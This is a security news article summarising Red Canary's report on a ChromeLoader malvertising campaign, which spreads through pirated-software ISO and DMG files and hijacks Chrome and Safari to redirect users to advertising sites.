A new malvertising campaign has emerged in which ChromeLoader malware is used to hijack browsers and steal data.

A sudden and unexpected spike in browser hijacking campaigns using ChromeLoader malware has been detected recently, said Aedan Russell of Red Canary. Russell noted that attackers aim to hijack browsers via the “ubiquitous and persistent” ChromeLoader malware that can modify browser settings and redirect the victim to advertising sites.

The malvertising campaign is financially motivated as the attackers are part of a larger affiliate marketing network and redirect the user to advertising sites.

What is ChromeLoader?

For your information, ChromeLoader is a Chrome browser extension distributed as ISO files via pay-to-install websites and scam social media posts that usually offer QR codes, pirated movies or pirated video games.

ChromeLoader modifies web browser settings to display search results that trick users into downloading unwanted software, visiting dating sites or adult gaming platforms, and participating in fake surveys. It is distinguished from other browser hijackers by its incredible persistence, route of infection and volume involving the abuse of PowerShell.

Attack scenario

According to Red Canary’s blog post, malware operators are using a malicious ISO archive file to invade the system. This file is presented as cracked executable for commercial software or video game so that victims can download it from malicious sites or torrents. Malware operators also use Twitter posts to promote the malicious executable.

When a user double-clicks the file in Windows 10 or later systems, it is mounted as a virtual CD-ROM drive. Although it appears to be a game keygen or crack titled CS_Installer.exe, the executable of this ISO file actually releases the malware.

ChromeLoader then executes/decodes a PowerShell command to retrieve an archive from the remote resource and is loaded onto the system as a Chrome extension. Then the PowerShell drops the scheduled task and infects Chrome with a stealth injected extension to hijack and manipulate browser results.

Red Canary researchers have identified that ChromeLoader operators also target macOS systems to manipulate the Safari and Chrome web browser. The infection chain is similar on macOS, but the attackers use the DMG (Apple Disk Image) file instead of the ISO.

Also, instead of the executable containing the installer, on macOS an installer bash script is used to download and unpack the malware extension to the private /var/tmp directory.

More Chrome Browser and Malware News

1. New Jupyter backdoor malware steals data from Chrome and Firefox
2. New Variant of MassLogger Trojan Stealing Chrome and Outlook Data
3. Chrome extensions with over 80 million users implicated in ad fraud
4. Malicious Chrome, Edge extensions manipulating Google search results
5. Malware-infected browser extensions stealing Chrome and Edge user data